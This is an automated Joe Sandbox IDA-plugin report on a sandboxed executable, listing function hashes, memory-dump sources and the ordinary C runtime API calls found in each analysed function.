                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 336800556-0
                                                                                                      • Opcode ID: 60993dc3b7e6dbd22e9f82fa2c9f75899b4eff5ffdff6b4b457a867a8051123e
                                                                                                      • Instruction ID: 82aefa3709696cf9e754a5c0f62c6e90c83e387fda633193bbd4b0994c532bf2
                                                                                                      • Opcode Fuzzy Hash: 60993dc3b7e6dbd22e9f82fa2c9f75899b4eff5ffdff6b4b457a867a8051123e
                                                                                                      • Instruction Fuzzy Hash: BE01D472601619BF27312AA75C8CCBB6A6CDFCBBA53140229F904EE142EBA09C0191B0
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(-00000004,?,AB1AAB9C,00E9CA42,00EA466C,?,?,00EA1489), ref: 00EA4552
                                                                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,AB1AAB9C,00E9CA42,00EA466C,?,?,00EA1489), ref: 00EA4578
                                                                                                      • _free.LIBCMT ref: 00EA45B8
                                                                                                      • _free.LIBCMT ref: 00EA45EB
                                                                                                      • SetLastError.KERNEL32(00000000), ref: 00EA45F8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 3170660625-0
                                                                                                      • Opcode ID: c8cbd1bc9c11c2405425a224f9bb780f17680f42f2d7d32bbfcdd136eda3b3c1
                                                                                                      • Instruction ID: bf9a941ac81a6e5dd372db493b1ca712242f1ead974319c16ee531e006d17de9
                                                                                                      • Opcode Fuzzy Hash: c8cbd1bc9c11c2405425a224f9bb780f17680f42f2d7d32bbfcdd136eda3b3c1
                                                                                                      • Instruction Fuzzy Hash: 0411A5F29016046F9B1163397C8592B659D9BCB7B5B252724F424BE1E1EFF0BD095120
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,?,00E98DBE,00EE40B0,00000010), ref: 00EA4403
                                                                                                      • _free.LIBCMT ref: 00EA445A
                                                                                                      • _free.LIBCMT ref: 00EA448E
                                                                                                      • SetLastError.KERNEL32(00000000), ref: 00EA449B
                                                                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E98DBE,00EE40B0,00000010), ref: 00EA44A7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 3170660625-0
                                                                                                      • Opcode ID: e282b3f9b83e4d6d88e868ba53de53c3e8dbcf6e1c85132904c09831c77a16ec
                                                                                                      • Instruction ID: e6af1c9fc60631e90862b0eb9c89e079642d610cdf1cb746b560736661f13fcb
                                                                                                      • Opcode Fuzzy Hash: e282b3f9b83e4d6d88e868ba53de53c3e8dbcf6e1c85132904c09831c77a16ec
                                                                                                      • Instruction Fuzzy Hash: 0811A5F15016146EEF116725AC46F6E219D9BCF775B252324F434BE1E1EBF0AC095121
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 00EAC580
                                                                                                        • Part of subcall function 00EA4646: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA1489), ref: 00EA465C
                                                                                                        • Part of subcall function 00EA4646: GetLastError.KERNEL32(?,?,00EA1489), ref: 00EA466E
                                                                                                      • _free.LIBCMT ref: 00EAC592
                                                                                                      • _free.LIBCMT ref: 00EAC5A4
                                                                                                      • _free.LIBCMT ref: 00EAC5B6
                                                                                                      • _free.LIBCMT ref: 00EAC5C8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: d1651f78c759ad42657804485a0c290ce099eb1238bc22bdd7968743f42bacd8
                                                                                                      • Instruction ID: 4f389ed46dff01f82ac573259d3fb16a860360c5b62b8c53b33a29cf541f4f64
                                                                                                      • Opcode Fuzzy Hash: d1651f78c759ad42657804485a0c290ce099eb1238bc22bdd7968743f42bacd8
                                                                                                      • Instruction Fuzzy Hash: 2DF09672904648AF8A30EB55F9C5C0A77D9AB9F3547742809F105FF6A0CB74FC808A98
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                      • API String ID: 0-2350925339
                                                                                                      • Opcode ID: ae1c2ecf158940447702c847b417a89d1f391121161c5ad4828831a6c3d99a2a
                                                                                                      • Instruction ID: bb2db11266905b7a83fdf6f6b15abfecffee0166e770b54b3307757602ab9017
                                                                                                      • Opcode Fuzzy Hash: ae1c2ecf158940447702c847b417a89d1f391121161c5ad4828831a6c3d99a2a
                                                                                                      • Instruction Fuzzy Hash: 00417371A04258AFDB21EF99DC819AEBBF8EB8E310F105166F404BB211D7716E45CB50
                                                                                                      APIs
                                                                                                      • Replicator::operator[].LIBVCRUNTIME ref: 00E9348B
                                                                                                      • DName::operator=.LIBVCRUNTIME ref: 00E93520
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Name::operator=Replicator::operator[]
                                                                                                      • String ID: V5$V5
                                                                                                      • API String ID: 3211817929-1174787237
                                                                                                      • Opcode ID: a7b636a1b517179abee22707ceaf1a3fc781b4c3f02347204edcd6acdde99b41
                                                                                                      • Instruction ID: 106b0574a5ee8fa0c31abab2d8588b9d43dd1b3dd746069bcf15df523043ba39
                                                                                                      • Opcode Fuzzy Hash: a7b636a1b517179abee22707ceaf1a3fc781b4c3f02347204edcd6acdde99b41
                                                                                                      • Instruction Fuzzy Hash: D33189B16043489FDF21CBB4D8857BE73E9EB04719F04280EE162BB182D7B49A44C740
                                                                                                      APIs
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00E3237F
                                                                                                        • Part of subcall function 00E8F18A: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00E49A0A,?,00E8C15E,?,00EE3CB4,?,?,?,?,00E49A0A,AllocatorBase: requested size would cause integer overflow,AB1AAB9C), ref: 00E8F1EA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionRaise___std_exception_copy
                                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                      • API String ID: 3109751735-1866435925
                                                                                                      • Opcode ID: 0ec6be2d99f94e0882bb0021605c7419db4218e14c30f99f6803ff1cec1b9466
                                                                                                      • Instruction ID: c0f570da63c2af2008e795776d1e3d314be7bad9244ae223855086e67e3b75ed
                                                                                                      • Opcode Fuzzy Hash: 0ec6be2d99f94e0882bb0021605c7419db4218e14c30f99f6803ff1cec1b9466
                                                                                                      • Instruction Fuzzy Hash: 2A1127B2900305BBC710EF68C806BD6B7D8EF55310F14956AFA98BB281F770A914CBA1
                                                                                                      APIs
                                                                                                      • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00E8FD57
                                                                                                      • PMDtoOffset.LIBCMT ref: 00E8FD7D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FindInstanceOffsetTargetType
                                                                                                      • String ID: Bad dynamic_cast!
                                                                                                      • API String ID: 2363274979-2956939130
                                                                                                      • Opcode ID: cdcbe78dad434bc40e1529ea83d8fda0b677d78884973a8ca2dddc29794f4ca4
                                                                                                      • Instruction ID: b11ff972cb5f9614b342b61534cad17316c2eeef0f8cd5b4f58c577bcdbdc1f1
                                                                                                      • Opcode Fuzzy Hash: cdcbe78dad434bc40e1529ea83d8fda0b677d78884973a8ca2dddc29794f4ca4
                                                                                                      • Instruction Fuzzy Hash: D021F972A00205AFCF18FFA4CE06BA977A4FB54724F209679EA1DB76C0D731E9018791
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strrchr
                                                                                                      • String ID:
                                                                                                      • API String ID: 3213747228-0
                                                                                                      • Opcode ID: 117e2bce455ad277bec5b8e57081e36723839e66c64098f01fbd1d0ff68ebf4a
                                                                                                      • Instruction ID: 7c8f47c9e1e210380231c4ffddc1b95e862af11028d5faeb217f45d97d7babd2
                                                                                                      • Opcode Fuzzy Hash: 117e2bce455ad277bec5b8e57081e36723839e66c64098f01fbd1d0ff68ebf4a
                                                                                                      • Instruction Fuzzy Hash: 6FB123719002569FDB118F18C881BAEBBB5FF9B314F2951A9E544BF281D634E941CB90
                                                                                                      APIs
                                                                                                      • __EH_prolog3.LIBCMT ref: 00E94766
                                                                                                      • UnDecorator::getSymbolName.LIBCMT ref: 00E947F4
                                                                                                      • DName::operator+.LIBCMT ref: 00E948F8
                                                                                                        • Part of subcall function 00E92444: shared_ptr.LIBCMT ref: 00E92460
                                                                                                      • DName::DName.LIBVCRUNTIME ref: 00E949B5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Name$Decorator::getH_prolog3Name::Name::operator+Symbolshared_ptr
                                                                                                      • String ID:
                                                                                                      • API String ID: 334624791-0
                                                                                                      • Opcode ID: 46098a534928f66a5283b9b6b8ddaa9c24ec631872e56a5c5bf6b2e3bad995e7
                                                                                                      • Instruction ID: 80425f2721c4b3c1cd0a310eaf5d35f5ce1ed74f583fbf1cee84790ba9c935c1
                                                                                                      • Opcode Fuzzy Hash: 46098a534928f66a5283b9b6b8ddaa9c24ec631872e56a5c5bf6b2e3bad995e7
                                                                                                      • Instruction Fuzzy Hash: 27819AB1D0424A9FDF15CF94D880EEEBBF4FB08314F14605AE915BB292E7309946CBA0
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free
                                                                                                      • String ID:
                                                                                                      • API String ID: 269201875-0
                                                                                                      • Opcode ID: 72ce46b5a8f187678b56e0c92ba54a366f0a43cdba24351086ffa4bba0802086
                                                                                                      • Instruction ID: 2021f2edfe1dff5faa57311ec43c0ba3ce03b794825dc89ea1b6b8599347d93c
                                                                                                      • Opcode Fuzzy Hash: 72ce46b5a8f187678b56e0c92ba54a366f0a43cdba24351086ffa4bba0802086
                                                                                                      • Instruction Fuzzy Hash: DC414B31A01105ABDB25BE7C8C42AFF3AE4EF46370F24261DFB29FA191DA744D425762
                                                                                                      APIs
                                                                                                      • DName::DName.LIBVCRUNTIME ref: 00E94E89
                                                                                                        • Part of subcall function 00E921B4: __aulldvrm.LIBCMT ref: 00E921E5
                                                                                                      • DName::operator+.LIBCMT ref: 00E94E96
                                                                                                      • DName::operator=.LIBVCRUNTIME ref: 00E94F16
                                                                                                      • DName::DName.LIBVCRUNTIME ref: 00E94F36
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NameName::$Name::operator+Name::operator=__aulldvrm
                                                                                                      • String ID:
                                                                                                      • API String ID: 2448499823-0
                                                                                                      • Opcode ID: 15105ef92b07702bfa1a3f9ebac4d393f1c038dccadfb34ffee893a5792ea078
                                                                                                      • Instruction ID: 441388dd430aea42cd6b4aa437c6840e4a7750169f5f925f17c1e44f3b23b2da
                                                                                                      • Opcode Fuzzy Hash: 15105ef92b07702bfa1a3f9ebac4d393f1c038dccadfb34ffee893a5792ea078
                                                                                                      • Instruction Fuzzy Hash: C7517CB0A0425AEFCF15CF58D980EEEBBB5FB45304F04A19AE511BB391D7709A46CB90
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,0000007F,00ECA8C8,00000000,00000000,3FFFFFFF,?,?,00000004,00000000,00000001,00ECA8C8,0000007F,?,3FFFFFFF), ref: 00EA92A9
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?), ref: 00EA931E
                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00EA9330
                                                                                                      • __freea.LIBCMT ref: 00EA9339
                                                                                                        • Part of subcall function 00EA6049: RtlAllocateHeap.NTDLL(00000000,?,00000011,?,00E8EE48,00000000,00000011,00000001,?), ref: 00EA607B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                      • String ID:
                                                                                                      • API String ID: 2652629310-0
                                                                                                      • Opcode ID: 4343fb5944fb63eae1ed0a675048f55c1cd46d4b3dac8074d432c3e7d35ea457
                                                                                                      • Instruction ID: 10a17d6adfffbba71eaa01297d4ee5da7d030319ce2f839f3ae3901b5d4a56e1
                                                                                                      • Opcode Fuzzy Hash: 4343fb5944fb63eae1ed0a675048f55c1cd46d4b3dac8074d432c3e7d35ea457
                                                                                                      • Instruction Fuzzy Hash: C931BE7190121AABDF209FA5DC84EAF7BB9EB4A714F054128F808BA262D7309854C7A0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 99ef30cb182649d994a9d10062b6604ab13951050c5cff18cc7dda3cdf1b53cc
                                                                                                      • Instruction ID: 2c1b38ef683db494024f8412957b99821ca5708e31a3968129ba9c41ac616471
                                                                                                      • Opcode Fuzzy Hash: 99ef30cb182649d994a9d10062b6604ab13951050c5cff18cc7dda3cdf1b53cc
                                                                                                      • Instruction Fuzzy Hash: 1101A2B220925A7EE62026B96CC1F6B368CDF8B3B8F312765F1217D1D1DBB1AC844160
                                                                                                      APIs
                                                                                                      • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00EAE9A7,00000000,00000001,00000000,00000000,?,00EA552F,00000000,00000010,00000000), ref: 00EB1CC8
                                                                                                      • GetLastError.KERNEL32(?,00EAE9A7,00000000,00000001,00000000,00000000,?,00EA552F,00000000,00000010,00000000,00000000,00000000,?,00EA5AAE,00000000), ref: 00EB1CD4
                                                                                                        • Part of subcall function 00EB1C9A: CloseHandle.KERNEL32(FFFFFFFE,00EB1CE4,?,00EAE9A7,00000000,00000001,00000000,00000000,?,00EA552F,00000000,00000010,00000000,00000000,00000000), ref: 00EB1CAA
                                                                                                      • ___initconout.LIBCMT ref: 00EB1CE4
                                                                                                        • Part of subcall function 00EB1C5C: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00EB1C8B,00EAE98D,00000000,?,00EA552F,00000000,00000010,00000000,00000000), ref: 00EB1C6F
                                                                                                      • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,00EAE9A7,00000000,00000001,00000000,00000000,?,00EA552F,00000000,00000010,00000000,00000000), ref: 00EB1CF9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                      • String ID:
                                                                                                      • API String ID: 2744216297-0
                                                                                                      • Opcode ID: 944f6dc7e9b193e27b8eb35ae7c43d4944ceecdf5c81c4a1750951b33a657374
                                                                                                      • Instruction ID: 42076f552472b04f0bfeccb1c9032338956eaf6fe35059aecc23deb2cf251d5b
                                                                                                      • Opcode Fuzzy Hash: 944f6dc7e9b193e27b8eb35ae7c43d4944ceecdf5c81c4a1750951b33a657374
                                                                                                      • Instruction Fuzzy Hash: DAF01C36400119FFCF322F92DC289DB7F66EB483B1B408155FA19B5121C7B2C820DB91
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 00EA1618
                                                                                                        • Part of subcall function 00EA4646: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA1489), ref: 00EA465C
                                                                                                        • Part of subcall function 00EA4646: GetLastError.KERNEL32(?,?,00EA1489), ref: 00EA466E
                                                                                                      • _free.LIBCMT ref: 00EA162B
                                                                                                      • _free.LIBCMT ref: 00EA163C
                                                                                                      • _free.LIBCMT ref: 00EA164D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
